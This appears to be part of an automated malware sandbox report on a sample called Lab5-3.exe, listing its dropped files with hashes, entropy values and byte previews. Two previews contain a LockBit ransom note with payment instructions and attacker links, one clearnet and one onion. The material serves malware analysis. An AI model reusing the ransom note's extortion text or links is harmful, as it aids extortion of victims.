                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):486973
                                                                                                          Entropy (8bit):7.617377460042818
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:AOVGV7DjB7+1BFzkyZVjME5AtPi6Xitch:lGV73IBFzkEtytX6E
                                                                                                          MD5:7E14B28F501C2CD3A2CF57977BA23659
                                                                                                          SHA1:71553D10B9BDB2F2043A5AF1726F76CD790D8C56
                                                                                                          SHA-256:FB17710B2CA3E360456275292075468099E9A1A2EB86CD9EB2FB59116598F018
                                                                                                          SHA-512:A665C4B794B7E29EA108244F62CCBE4FE32B59079247B16E1082CE1104DF4FD88E5CE22EB7752C84035FF132EB1F24D815C9A1790EA6C08C78FF9A5AABFAFE48
                                                                                                          Malicious:false
                                                                                                          Preview:.`..."........y..h..N..OA.......N.mR..?-j.1O...i=............C0...-.,..;..J"%E......h.$...`v....O"..J.....UU.....z.k.^=.;...(..G..Y*.U2&......1y......)L..m}uA..4..{..R..:...h...4..!S`!.6.".....{...`..".g5.a6I8.?qn=..W.+...C.RD..pC.F.b.X.5$...>.n.z...2.x*.i:.......>.t.0.....w.q.D..\^?w.@.h.vK....J.d...J......p........E..O..c.!.....t.Z..r....87./6n5..{I}l.bI.!...V..N$g|&..Nb.....)'....gnq.\[....J..5..^.2.n.....T(...9..I..../w..D6....Q.Y.g.U...'......_..>V.....Q..5...c..L.|.Y..].Ho.....n$.H?D.e..N3.|.V.ak.h.:.......}}....A.d.>....T.Ac&.{.`*.5d.|.Z+$>.k#J.Q..,8.=......Q..h.........S.s..A.^..........3...Z..MB;l...,/&QdrMpi.C......u..R.E....F......7.......;R*O.~B!.GS.$:w..&[..8/.k:......K.Yr;.^m...{..i.1|.....0H.Ds..k6.VJ...R.6q...J3..Z;...6Kt.'...J.-UxoP.......".k.....R{...3.r`9>;.U....70.$@...4e:..{\..~.....^............F..h.6.\zv..._kCZ.@.y|.6v.{.;V.e..!. M>.&....^.#.H.-.h...(.Q.kG.....2j...6..WNtW...c#.F....&..s>...U.X..h.ya.v
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.93661919416952
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:SE9NC43HcsF2w2COIpojHfUTid3hBaUoSGFcmeykEdEElU92i:1tXHhLowGx0uKeY2ElUJ
                                                                                                          MD5:C67585A30F2615BB5F988229DC79F94D
                                                                                                          SHA1:FFCB74293280B1829885E0B36AF3BCC87CA0BD8E
                                                                                                          SHA-256:03FDBF9BABD40037619E41B92C26519D345B3212FF33C0118504EFA132812178
                                                                                                          SHA-512:3DFB7A30A7E7D46EC19846D1104274994800069CBCCB9D46914006C85BA1D97806DA2C3A53ECF5051874F59113A2C23E9B861D10479B080D9D9CE0E7E65D3267
                                                                                                          Malicious:false
                                                                                                          Preview:...8..p..6C...G.\.....R.LVqz.Mv[.%..h0T..<K+3.C8.`..Q'...i.8.(qr..m=fW..X.\....2|c..>8......<.8.T+..7...*./.{L...)...t..k..xu.^.KY.9u.R..mg\....2.:}n./M......).K`.sX`....-....U.M..i~.E...yC.p(H. V...i./..=QA.jM0.Z"ZX..u.......5.B...../F..5.w.)..1...8fY.....,e..,M....zy.F.w.s...UC.h...T.ez.jr......a.z$~.dV6....{...*..l.....xL.}....:_....%... .5s.D..Hzbd)uB{........`.T....*c>.&......_...'.F.)...-...sH.Pu?..w0..j.....A...M.,..).....5.2l.........0.H.v.f..."<...UjW...V@Y.r...v.....k'...w.CP.....k.RGP...I..:FJt/..99@.j....W.)....0..p+u.+...n._..agV.K....LC.........*.s.*.8....8Z.6QG...D..].c.|l#.......,...ZO..#.K..v.)$..w......@@|PT.^*r.p]......8.9.<.sg.qZ..L*]e.!<.~....(.......sz[.'..n.m.....:...~.hTT.;....O~.V..K..n..'Q........O...#..y....[..E...4_nP[z..!..T.l...N#-0r.D:.qz.8.n.^v...5K.)'.....U..~.XF.#.+...._....?.s.f....M`qZ[nF.Xz..Ei.:.|F.......k...i..&..o.0!.F...._S=AuV..J....s.5...w..q+/......q..\.{......w...4..7....=....*b.I.....gg.e...G.8.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.932416340012777
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pABfsAFpnZ/vMzNZ2lk6EgcjlcwDHfUTid3hBaUoSGFcmeykEdEElU92i:ifso9Z3MjixEFl2Gx0uKeY2ElUJ
                                                                                                          MD5:4A8D309F38154BF95744CD2F818A6513
                                                                                                          SHA1:6B6AA959A8CDAB9A1F6682B5747FEDD8A1B8442F
                                                                                                          SHA-256:B6362D9B153D0E3BC440AA9D688DF2481CE67F0277989ED16BEE8AAF9041B875
                                                                                                          SHA-512:5B165B2C73F004E3032D368CE5927D322D5E22E7867226D1E19D86A817743D2491CF02563D802350A242A2A783B40AE86DCB98B123D5D3EA9E001CECB20FA6F9
                                                                                                          Malicious:false
                                                                                                          Preview:.pQj.....#..+.T.db.h.......7....cmA..wK.\.)#..(qS...;|;.9X......Q...3ev.......}.Q\.S.}.............+.*x...j0...d.......u..s73.xb:.LJb........._XB..H.....G.dEra.U&)%..x..Z\..M.-...]...!...C.$...W..u.9....akR.]`;W.8Z..d.D.O...5.../.s.._..q.t.#.<(...V/&u...<..:.W.ky.W..n.N.!D..+..^...%.I0].h|..~..68~.J..xY..`k.0..c....z..{..~xV.g..m./W.%........n.m-=$(.0.`.........~0i.?.H..2(1...|.|..+.....=.L'..C.:..Z....6u3.D...t.~..Y.F.QBb....|...!.OQ.8..<.*.M#.d....].U..F.l....H....$S.=/..mu....|E..r/..VUP...[...%..!.2L.."._..E......-Z.iz.g.{u../;....J.J...`.C..`....Og...C>K.+..COd.f._zy..b.T!,.e..is7..O..............y.oCB^....T...F;..K......$.Sh.W&0.[..Sy...(..(..z.r.U..+&...<..n...;`f.VG._.`xL........H.hZ..r..5.n3/.eGP....$0W.%.....}...{%d......9..o...|.$+..L..f...(..8..W`....h.....B...Vw.....+.@.. J....U...j...p.1T..uk...v.5.P.1b.>...G..[....?...........J:%.r.E.C,........p>.k.%P.;...WU..{...R.. 2."6..h..*6|:Z.4(.z.......9}.K=i$.w..A.:..y^..'.E.Q
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3712
                                                                                                          Entropy (8bit):7.947421535373682
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VZkfLbqrN28fBnGZgLH3bmbJc/pdV5HD3OU1x2m7+Oc8XPHfUTid3hBaUoSGFcmk:j+mN2qnG+GQzrH7+IXUGx0uKeY2ElUJ
                                                                                                          MD5:32ED05A1AA62EFADBD51C7D68C5AA95D
                                                                                                          SHA1:10A9557B531649AB68594C2907FB558E69D3AA93
                                                                                                          SHA-256:E68927D65DB539A175ED50231DAD55A43B603A8FE9FF0D62385F8A980C851745
                                                                                                          SHA-512:CB55C44A5AE585671A41F8B9671A4B831199F01345A50C92524BDC855AD7ABD13B1226D98604239EFB8BB8F0062F9CE1B1B082BB1E13172783575F2ED401E5B5
                                                                                                          Malicious:false
                                                                                                          Preview:.8..m........_NX..4A.Cg..I.........g..A.7.ID..AY.....O....kG...U....5...s....#...F..J..k......%...8..-.2G.........o..".....f.t.X=........,.>..c$Q.......c...m....w.S..L.9:t.1.d...t....7y.m....+.|O@...0_.h..aD[...t....(&.j^...>e.&...s?..!....$.......)6Y.|..F..6...............t.K.._e..P...=.D..ojlU.yK..1..."6.'Q&.P..E..v.h.'#".H....I..h..F$.-a]z:. *...-O.........>.b...u.p..}...j..Y.S.....^x9.d.t..1f|.y.....S.j.^Y.L..e...H..C..'a>...p..Y.j.nE*n.Z..QV..z....Bj.....W..0>..;..0...Z.Qs..7w.....U...w2.a.Z.D.....iRX...A...4-.\p\u..k...B..X.....y....B..&.)..-..6...Q.\..5.....e.2......-.g...,.........vJE*1.I./5C..t.E...>..S......1...y..9..<..m.. .....G...Sb.v..z....P..@;=Y....?.L...}A....1...H....j..5.Mz-..G...X#.c..P4..Hf..B ........G..P..Z#....0."v.....d.RB...or...ReIR.p..X....`}Y.;....O..=R..o...ZW.r[.mH..R.(h{|..Z...#.6"..E.5.'...lLd#..e.Yu../...M...H..hwo.Y.v*d...<eBf-.}$d@.....1.s|....<'.Y....-..3....hI..$l.H.2......|....e=....qn..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10704
                                                                                                          Entropy (8bit):7.983486956417105
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:SEckQd2moZPwVHPBNmfrl+LdAjtbqs9X4EyYpqrMI7e0Cb:J4EmoZPKbdCtbqsV4WpqrRetb
                                                                                                          MD5:6E0D7149C357BA348A0BDF890AC0E2DC
                                                                                                          SHA1:48728E42BB9428F74E0193DE94D57BED9AF05950
                                                                                                          SHA-256:18490768F60FAFF1EB37ED23051B2BE36A804ED89AE63858DCF070FA631D3EA9
                                                                                                          SHA-512:69C2E3C98903EC02082C963352E18BC261D54D62B0A6BE875BF8C0C2CD56D93C0B02A2246F15401BDD5A83B33B808313E732B41CB1464D34BFC7C401C073CDD0
                                                                                                          Malicious:false
                                                                                                          Preview:H.,.>39....;.,g....*D...`Q...#..a.T..SaN..!.h..IS.............E+.$.%Kt.+.....c..Ti..T..|]...7........Vy.M.rx......m.qh.=..\Zh...v...Rs.. ...6.X?:..@.0%N..a.~d.L`.!......s..N5TR-Nn..D..+.:....P..T|.>//..%PL..#..=&*r..^0g.V..b.0....A.-}...E..#..e...ST.....Ht...5....d....V4.(.:...3T........s.jB.=..Zx....~.U...K..5.U...+..a0+.U.x'......U..`3V......V./..Y9.@.....s.....c....c`>.R:u.b...B.k.Ta/.4n....?.u.hm...(......g.....@[.(.cD....*...-.K.]{.i......E..v.^.....Pns.VS.n..q.V.`z<TDO..*..a#....Y....../.!!.b>7...v|.`Z.KGo.;..\.#...m1{......d.....T..co.S...).D....s!.d.....\G.....t.-...^ZN.b+.7\W.p.@...=......8..."T.w.6.....k....Z.+R.F...B.....q%..v...k.)H.y2....m..Jp.=....a.W.~...ay..HA..J../..\.....<C..(..s.........Y..)..jf.,...!.#T.;lr.Z.....K/.HZ..V...{P...@.rv.m.4.Xr../Z..O..[N".5.(..R..vZ^..'.......$H.......w=..%.ws..(+..G.n.:#.....][...iI...e.Br..v.X..%.8._.....Cr!.?..N..~.EoS.Mz...p...z~.fy.'.}uR.L...VtXwU.Qx....?.y.fbWF.2.oq.8(.h`..&......E;.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11488
                                                                                                          Entropy (8bit):7.985109661671002
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:u88MRCLezB9Nb9Ki2ed8LCQkpnMHaO29/vkRjbFu/IRZDYIka4iz9P9r0Cb:urMoSoWNpnIIBe0IRZDYIkOJVrtb
                                                                                                          MD5:2DF42B1EAF69B3A2606CD1E19813D259
                                                                                                          SHA1:5FEF21B5C6A115D242346867BBD83D4DA8594DAD
                                                                                                          SHA-256:1B0A317A073B9A526F8CFAECDF820578533284C6D4E7F109EAE36FA49D9F099F
                                                                                                          SHA-512:8A6DFAC0B8F31CE69FB31128D34F27D7879CDE44CE911926029696EDF4C696118D494D21A3859236D880BBF7F976FA81860E5E7E90832B6CA6A0A88D810E4F10
                                                                                                          Malicious:false
                                                                                                          Preview:I).z.s.kQ..!........EM.NG<....J.2...W..m..%./.....T>J..!00...2N(Dj.....n,.......-."......sm..kIwQ.R).[...C.....z....r..T...<...30..~\.f.......(.....m..}+v`+=T....O.4b.^.F,u..gg..7Bl...Oj..j.7......X.[..b...........ek....4.>.g.I...q.W...N.._...L...]w...|.....DC...Xa.....Nk....m...}..)........i3:.......r..&.^.Iu..3..Ne.Dp.0/k.]..K..<.98...L...&..h.........;=..F ..=...a..m:.fc..n..}:>.U7..#?.Tl...W.CH.W._H.Fb.E.!...0...l:.C.O.ST..S.{.*..[z..N...Z..h...D.&a{."...m..:l..O......4....Y...5...............j...|.9.....+t..vQ..}r.....m...f...\.W.3q..5. ....u.5T....{.B.x.....e.`.^-.z.2|....$....-.3.=$lCU}.kh.h.....h..%.kE..SMYC.Y..f.7V#..a.&x.......U.<.....a..>.5~..~...tQ^...{ZJ...1#.........-4u......`&.....x......0..1_..Vg..E..%..2Q...P#......}!g...:@.......}..U.......U..K..I.h.....-O3.........>..i......\.X..?y..._>....}...J.....Zd....z.]..#s.;....E....3....8.\c'^J......D....W/.,.G9.h3...X}'..,..&.....(..5.P..U.<...*.d......%.c..B...lc.a
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21664
                                                                                                          Entropy (8bit):7.990094111823336
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:sggiAfSN1/0Tqc5tX4RDztIRYoNi6Bt8vRcj68I6Eotb:AAyTV5tIRn6Y3jvp87Z
                                                                                                          MD5:BE8BC3271D272249F402C911FEB12832
                                                                                                          SHA1:2E257E77D257FD841D65BF3E9A706ACF38E2980E
                                                                                                          SHA-256:84FD70CBE6EECB5B9C70ACBD444E824C75B0EBBBE704132F0FAE4C252A61A16F
                                                                                                          SHA-512:F2D7CC68B69DFBFE72AF92F3353C9D08E7F8A1C556040EE2D2E9224F722BA7A3BB0366B7C60D8D7D291C2B0C29B397C083D70CA4DCFED5A426B10C54BDBD03DE
                                                                                                          Malicious:true
                                                                                                          Preview:..q.`^.BB.rF{]`:...2.I.D........U.!......5.."..i.....8d.&.-.0..6..3./..r..W..._B*..sU.'_j...v;..$.-h.D.=*.+..(...M.....N..@@....5.sia!. .J.GH.....y.....K......|;..!._3+......H .S.c..-fN.....7_.+S.O.j..s{....P.Lj...S..M<"..pdZ.!R....EA.5...K..A.5......|..9Jg?s.....g..j.o.W3'.w.N,!(a....@..g.G..... .,....DS=....Z .......`..q.....c...D.U<*.{F1.7.q...8...t.)....e.Z\..<..k'..).-.Y...f.7:WY....2_Na...Z....!.....s#....d..(....#.,.E...hRD.N......RW..,tD...........o.x..O......0.V.28..?B...U.......M...\.D.......|./J.x.,..'...(.X$....!...L.o W..^U~....v.m+._....5.e.|V....,..w{..|....qe.Q..`p..M..,E...vr.%U...1...&.i.F....../...0F..V2..HUzXy..m.v....F.8Cq=.z.rogX.RD'0.R.......z....C....R..o...!.....yq....,...T....g.'.@j...J..n.x.?.9......h. !L m7...\.#a..s..i..`"..;.'.8.N.C...DR.(.b..*HoR.E..b.H..s.8..../."aB...8d....~...g.#.`1..|.......^...3.;e..q..=, .K]V.+ZM.&..'.%A..&^...B<.NX8.t....o.g.`^j.P.P".....H...u5...U..........._..P..d.0...ZI.*...Q=..s..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1744
                                                                                                          Entropy (8bit):7.887427363481371
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:m2HzFQhrzBo9ElqHfUTid3hBaUoSGFcmeykEdEElU92i:hTWrzNFGx0uKeY2ElUJ
                                                                                                          MD5:DAF6DC900198880C5DEB36F36A1B56F3
                                                                                                          SHA1:4FB7E142595375660F4C4291C0AA549AE7B5358D
                                                                                                          SHA-256:F5710C63AF7D2760874E776184811279BBD9B99E67F0ADF4FA57797E9F6DEF7D
                                                                                                          SHA-512:77DDEC33691667196C0032CA5EDD15F8130FEFFF3F28A3B85FBBF2765A267AF861D1BFA131CB33BC6E2E6D62E521270B9EE6D246244CE150786BD037D3D67415
                                                                                                          Malicious:false
                                                                                                          Preview:E_..4.B=l.JY..*g..&./..|>^.NK,.X.....9....~..VK..........Q....x.RJ..A5Z.....d.@..X.p.C...B..M.0.K.M%u.5...>.x....:...OE....C.0..$.,.e.(...VC.4...+q.......f...p...."Y...A..4F.)O.&A....uO....na\...\..6.M^..5.....K.......a.q7......4.Y....xEbBed........$......A....Eo<./j#...............n..7..."..wf.|.=..:.ikl.1[<.VA..*WJ...0..m.~.......'...eM....$...2:.6.,M.W#......x$#I.0....(.....h....w.....t{..9O..O/..$.."cKrr...}*.`4.Z.%..-%..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7824
                                                                                                          Entropy (8bit):7.97844230479603
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:6pNIw03wcvdoDDOVXdMd+w+wk+vf5vGp0Cb:ONswcv2OVOPnkChvatb
                                                                                                          MD5:CC6C24E17B3B3F0CB4F75F717FE8B0DE
                                                                                                          SHA1:BEE18CC596D0FF495C74897EB68021A0DA170020
                                                                                                          SHA-256:C1B94D3809BD439537E291F714677472E9725B449F7E906A3FA9EF854400F715
                                                                                                          SHA-512:CFCB83CFC9984A7A62FE099BBCC26BC61E8CF3C6D573FFB58BAD8B43F9AAA73310705244F3DBDFEBC62AF7C3485D4B96D9D8EBE86F45BA50BC24052B0338D10E
                                                                                                          Malicious:false
                                                                                                          Preview:.~...d...;]oq..._.X.,..D.J.u.O....Z....T...V.HBo..........d.....(.#...W...J.7.,..|.. x3..j..t.../z].s{.:/fC...X,....b.6.<8..`s....Y.L.y...6j......#.....L...r...o........~..Qup..p&.......4....>.P.....ec..O>...A...c..J...Z....3O.^2.@.8.6r.....&..s..l."wfQ#8d.9.S.....ai..$}.K3.H.m..{..E/.f..0...m.A..i..?...../..;....K.6..'.T0g*......6Gd.. ..B?Rq)..W...LT..5.X...4.d..s.=B..k/.).......4s..U......t.....^.g.-D.9.=..ER.^Z.........PxI.r.!...NZ..|...Xiu,L..7..Q.....7..!{.6.E..U}IH.C..ky..0D7.l.>..0z.>...2c~4|...\v..../.T....../.J[p.*....5R...].].....................A@....,..q....]vu..F.....3.4.7.Pdpp...'>..S..?._CCd.QtA...r>....x.p#..7.p..._#..y.....-..nK<.".w..n.@.%9.;........p.VQ.0.....d..........'Ad......F...K.....M..WXo[7..h...@.B/..q...&..w......c....#u.....u....T.W..X..P.w.K..q...F...A.[.....$. ...8...M.#...(...'.i..xx......P0qf......K.Z..E.(.x6K.G../M*>..%f.K..WC..s..y...;.....Rt.u.r....M...@H".i..pD..0..,t..K&H....wu...H.W..5....%.].+.6..L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14976
                                                                                                          Entropy (8bit):7.986963992987097
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:owWBIrFVTdu7f/mg6dykvC89GNrcsTjg4wRtb:ow4MFVJu73ajCyEtTjTwRZ
                                                                                                          MD5:68E7A3A88CF318ED5CC97F37690941FF
                                                                                                          SHA1:3CABAF8810C881904385098A7838ECD38E0B45AC
                                                                                                          SHA-256:0827A8CBD3D2236A6AB2098FBCF5F5E1FEC28457B0C5957788B36F957C836E32
                                                                                                          SHA-512:2FFFAC5A9C5E5E0FAEB2E03CE9F0E059009691058DCF44CF17E2D2BEDB80C95B53E4ADC27CBE9A6BE9FF89731287573D5B0047434AA8F9C2E4D411B8B4E3276C
                                                                                                          Malicious:false
                                                                                                          Preview:.Vc.p.fu?/k.n.$y(.....^........G...G}K} 4..k~t..n..$...D...T..........I...&6,..\...A..........v...e......5w.......6.a$*.......~CQ.N Q.D..W..wk+......B.......k..mJ%...&....(DQ.~`334.!.[...G.......P.f.4.GZ1.....6Y.S=.X.9.\..d..x...^G.T..|g.d......V.|!.z.r{..p.a.........X.9.("......"_./....m1.m\C.&.........=.g|.(..X...j...&.4./..*.LR{....`.i/@..r<.UO:....w#.ft.oF.......&.b...P.0.Gw!.)6.L..._t.K......f(...J...c. gp.,...C7[...'*|....N..).9S....Dd#.,~.o^8.....<UB0P.......|,.........st....?`r&J.eQ.. ..."..7@.....e.{...R....M.s.s.,.....5..[..1.E...cL......F.x.}:...*...g.........C]..."..Y....U.?...L..i...l..@....<.#...^..Usg.O......X...N..<.G...."......7`..B ............h9._..Z&......NS..Qel#.P..<.2../..xm]|.. ......Ad ,.....#.. s...p....f......z.....X_..+;...;.....O.V./lE....$....RT........e...Efl.P6..m....&u6[....*..r^.M*aw..g~..A.+.dc......k'UgP......s.P..`vx:.y..C...x./L.{...F..l..3..}..tp.%1.k.7.U..J#?.g..d.......4.~.O.7`..Bno
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8224
                                                                                                          Entropy (8bit):7.977904251061485
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:w2FOKMbuHGpyqVJUlAFHo3wWDlL34U4TdBGrY96Z8SMP3m7xSW+T/Gx0uKeY2Elk:qPczqyJr4UqdByW6Z8TvMG80Cb
                                                                                                          MD5:52C725A2C6264041FCE8738AD8FABE50
                                                                                                          SHA1:8FEFB612FC0A6F02A083A75B9AB97AD3635DE5E0
                                                                                                          SHA-256:3EE90E4F294688D3682A7ED53393B8D4B8108B515B1A24C2982BE20783503C35
                                                                                                          SHA-512:E7190FAB45033EBA89889B09563E08E9CD4E5CFC9362E3EB4B2AE891282B746E861AC5EF1906CE22973F794D2FE301DD1CB228CD7150A63FEF41BDB6B0AC00D8
                                                                                                          Malicious:false
                                                                                                          Preview:..O.?^....;*.@.#..;.."..M.......8.0[.c.-..q.>>.x.....U..!Z...;v.".....y....D...x.....c.V.fX0.#o.|Q0..4..3.E.$ ...]..u...._.Sy..w...G...ke..B.vsS..|).......N.D.....~.C....`..g&V#.`4E.H.d.~i8...&..2....i..!K..C.....hX..(.E>...e...k....3.h.?G.....:...m..........Q.. .y>.R......,R..J^..fenn....m}1?z.d..6}....|h..$~..`.dc.x.....QC.....g...\........'..f|.......Jh.-T.g..E.m6.....L^...s..=..bd{.J]b...GN....tS9.4..fW0..~....N..jE....s..L..Ml.S.0......l...>.WR..+...n..C.P......?9.O~_........;..z.,7v#P....&..(P.g.J..k....`)%Z.^.... .X.A...[..2..I..t.Q..T/.g..]..n..Ic.%....?%Uwl'h.c....G......%.. .H..Q.$#{..1n..IJE|.y...NQ\.2W.f..s..V...1d........m.+.....9;..W.......x*.F[D?~U:.[.:...;...3..*..\sn9.@.)......oO..]w...,.>)......2i..CVi."..y...DT.. .&`.b....v ..:.....K..G..1..`.....0.v..{-......Dy..lH..._,j...cNZ..M_..L..DG....7..z..)AG=....<r.$.|.F].0....!.IFw....iu.+.0.h2).8.?..^_7nt.7U.^fZ'.. 6<.r.....x1..<......L...a#6..mD....R......W.Ur3...._.y........,.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.924994784056393
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6d0bJ7w4dJ47wYvs6ntlFeMojzbkHfUTid3hBaUoSGFcmeykEdEElU92i:6Wb+4dJ4MYvVtgjzfGx0uKeY2ElUJ
                                                                                                          MD5:A2303C744D507D81DE926040D2FE1DC2
                                                                                                          SHA1:22A6A4C2510D0960575DB12F9CCB654B51042E7F
                                                                                                          SHA-256:282814384F0109FA1951E2066AE425F6E2C6AE745DF4E91FD9D4A8911AC0ACFE
                                                                                                          SHA-512:BA7593C3303D46F2974A2C31A5ADF8A794B040CFE6B6CC9676D7D6515ACAD08FFEF8CECF5CC8C4299A91BE9CFEBE5F41314371043110C5AC56C88A7F67FBAC21
                                                                                                          Malicious:false
                                                                                                          Preview:O..f.c..B$..v.z;A...UT..dN.N.zv.)...7.a>N.R.y..e..W*&..\f.d..f.C2cg$VCf.{.-...-t........./.qV.t..as=}.{.CJ.E.j<..$...Z...{..z.Q.md.r.K.........3N..8.rd....Vx....f.=7.C.SX...|?...V.. ..jt^`...&.....tK..,.7n...c2...`hY../c..Ls.a.T7.C.Q.%.0..,3.3.I9....l.&t..0W.\<A.h....D..C`z..x=+....u.hM..i..wJ.@.J.k.f....g`.....!.r..kDI.>.t..T.........T!.{...R..`..h..{..~....X...Q......^:J..g$I...y;..K..`...7.@..l.@..fr..I.....K.1..n%?^u...0:....QR.G..l...0Um....[...B.=..Z#.2"!.<|..........zR"w..s1PL.u>....8..33.&...?!z^.'t....h.oO[k.......IU..:........:....!s`&...H..].2W..Q.<A.V..ky.[...V...E.}.....0i....^....B..:z..po......u...d.....t.*..A.?..u.....|.=[...Z9..W4z....H=.M.....k...S..'..j....T`.zP..bl..<....>..x.K........[+.>.g...5..;.=.......{U.@/...]......8..5..b.U_i\*|...E.).nB.!W.n.].....z...nD.I]J.#.....R..d.R..=.>...w.#..=Wl.2..Hy.....C.Nk.<H.uf.`....."._.@.....P..... . .>.7.....98..RC...hD%9.8X* ..C`.......5.S.!..%...._,5%..h.azs`;=e+.:.P].....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
